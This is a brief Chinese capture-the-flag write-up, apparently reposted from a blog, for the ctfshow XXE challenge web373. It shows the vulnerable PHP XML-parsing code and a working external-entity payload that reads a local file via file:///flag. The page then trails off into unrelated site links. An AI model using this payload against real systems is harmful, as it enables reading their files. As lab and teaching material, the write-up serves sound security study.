ctfshow_XXE

其他 2021-03-27 18:14:29 阅读次数: 0

文章目录

WEB373
WEB374

WEB373

这里先放看一下理解漏洞之 XXE 漏洞
在这里插入图片描述

error_reporting(0);
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(isset($xmlfile)){
    
    
    $dom = new DOMDocument();  //创建内部类Document对象
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);通过解析一个 XML 标签字符串来组成该文档。
    $creds = simplexml_import_dom($dom); //把 DOM 节点转换为 SimpleXMLElement 对象。
    $ctfshow = $creds->ctfshow;
    echo $ctfshow;
}
highlight_file(__FILE__);

这里直接放出payload：

<!DOCTYPE test [
<!ENTITY xxe SYSTEM "file:///flag">
]>
<yu22x>
<ctfshow>&xxe;</ctfshow>
</yu22x>

获得flag
在这里插入图片描述

WEB374

猜你喜欢

转载自blog.csdn.net/qq_45951598/article/details/113753663

ctfshow_XXE

ctfshow xxe

CTFSHOW XXE通关指南

ctfshow XXE web373-web378 wp

xxe

xxe方法

XXE漏洞

XXE总结

CTF XXE

11.19 XXE

Blind XXE

Normal XXE

XXE注入

xxe靶机

XXE（1）

CTFshow——SSRF

【XXE】XXE漏洞攻击与防御

XXE漏洞——xml外部实体注入XXE

XXE漏洞学习

xxe漏洞呀

XmlDocument 避免XXE

xxe漏洞实战

浅谈XXE攻击

XML防止XXE攻击

XXE Lab：1题解

xxe漏洞深度剖析

XXE进阶——OOB攻击

xxe漏洞学习（2）

xxe漏洞学习（1）

PHP XXE漏洞

今日推荐

TIOBE 5 月榜单：Fortran “复活”进入 Top 10

GCC 14.1 发布

面壁智能发布 Eurux-8x22B 开源大模型 —— 堪称「理科状元」

开源日报 | 谷歌扶持鸿蒙上位；开源Rabbit R1；Docker加持的安卓手机；微软的焦虑和野心；海尔电器把开放平台关了

中国码农的“35岁魔咒”

蘭雅 CorelDRAW 插件 2024.5.1 国际劳动节版，免费下载

Arc Browser for Windows 1.0 正式 GA

90后程序员开发视频搬运软件、不到一年获利超 700 万，结局很刑！

周排行

基本数据类型封装类比较 Java源码解读(一) 8种基本类型对应的封装类型

JS实现无缝滚动上

深入解析HashMap原理（基于JDK1.8）

mysql的连接池

关于.htc

linux下的ubuntu12.04图形界面

【数论】好推不好记的扩展欧几里德

设备树详解

cscope + tags 简单设置

xml学习

每日归档

更多

2024-05-09(35)

2024-05-08(42)

2024-05-07(14)

2024-05-06(40)

2024-05-05(0)

2024-05-04(7)

2024-05-03(19)

2024-05-02(0)

2024-05-01(4)

2024-04-30(1)